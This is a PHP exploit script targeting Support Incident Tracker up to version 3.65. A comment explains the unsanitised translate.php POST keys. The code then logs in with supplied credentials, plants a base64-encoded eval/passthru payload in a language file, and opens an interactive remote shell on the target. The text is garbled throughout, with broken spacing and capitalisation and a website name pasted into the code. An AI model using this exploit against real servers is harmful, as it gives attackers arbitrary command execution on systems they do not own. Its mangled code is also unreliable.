<? Php
/*
------------------------------------------------------------------------------
Support Incident Tracker <= 3.65 (translate. php) Remote Code Execution Exploit
------------------------------------------------------------------------------
Author: Egidio Romano aka EgiX www.2cto.com n0b0d13s [at] gmail [dot] com
: Http://sitracker.org/
Affected Versions: 3.45 to 3.65
+ ------------------------------------------------------------------------- +
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+ ------------------------------------------------------------------------- +
[-] Defect location: translate. php
234. foreach (array_keys ($ _ POST) as $ key)
235 .{
236. if (! Empty ($ _ POST [$ key]) AND substr ($ key, 0, 3) = "str ")
237 .{
238. if ($ lastchar! = ''AND substr ($ key, 3, 1 )! = $ Lastchar) $ i18nfile. = "\ n ";
239. $ i18nfile. = "\$ {$ key} = '". addslashes ($ _ POST [$ key]). "'; \ n ";
240. $ lastchar = substr ($ key, 3, 1 );
241. $ translatedcount ++;
242 .}
243 .}
Input passed via keys of $ _ POST array isn't properly sanitized before being stored into $ i18nfile variable
At line 239, that variable will be the contents of a language file stored into 'i18n' directory with a php
Extension. This cocould allow authenticated users to inject and execute arbitrary PHP code. Furthermore,
Access directly to/translate. php? Mode = save will reveal the full installation path of the application.
*/
Error_reporting (0 );
Set_time_limit (0 );
Ini_set ("default_socket_timeout", 5 );
Function http_send ($ host, $ packet)
{
If (! ($ Sock = fsockopen ($ host, 80 )))
Die ("\ n [-] No response from {$ host}: 80 \ n ");
Fwrite ($ sock, $ packet );
Return stream_get_contents ($ sock );
}
Print "\ n + -------------------------------------------------------------------------- + ";
Print "\ n | Support Incident Tracker <= 3.65 Remote Code Execution Exploit by EgiX | ";
Print "\ n + ------------------------------------------------------------------------ + \ n ";
If ($ argc <3)
{
Print "\ nUsage...: php $ argv [0]
Print "\ nExample...: php $ argv [0] localhost/user pass ";
Print "\ nExample...: php $ argv [0] localhost/sit/user pass \ n ";
Die ();
}
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Payload = "username = {$ argv [3]} & password = {$ argv [4]}";
$ Packet = "POST {$ path} login. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cookie: SiTsessionID = foo \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Packet. = "Connection: close \ r \ n {$ payload }";
$ Response = http_send ($ host, $ packet );
If (! Preg_match ("/main. php/", $ response) die ("\ n [-] Login failed! \ N ");
If (! Preg_match ("/Set-Cookie: ([^;] *);/", $ response, $ sid) die ("\ n [-] Session ID not found! \ N ");
$ Phpcode = base64_encode ('passthru (base64_decode ($ _ SERVER [HTTP_CMD]); print ("___");');
$ Payload = "mode = save & lang = sh & str; eval (base64_decode ({$ phpcode}); // = 1 ";
$ Packet = "POST {$ path} translate. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cookie: {$ sid [1]} \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Packet. = "Connection: close \ r \ n {$ payload }";
Http_send ($ host, $ packet );
$ Packet = "GET {$ path} i18n/sh. inc. php HTTP/1.0/r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cmd: % s \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
While (1) www.2cto.com
{
Print "\ nsit-shell #";
If ($ cmd = trim (fgets (STDIN) = "exit") break;
$ Response = http_send ($ host, sprintf ($ packet, base64_encode ($ cmd )));
Preg_match ("/\ n \ r \ n (. *) ___/s", $ response, $ m )? Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");
}
?>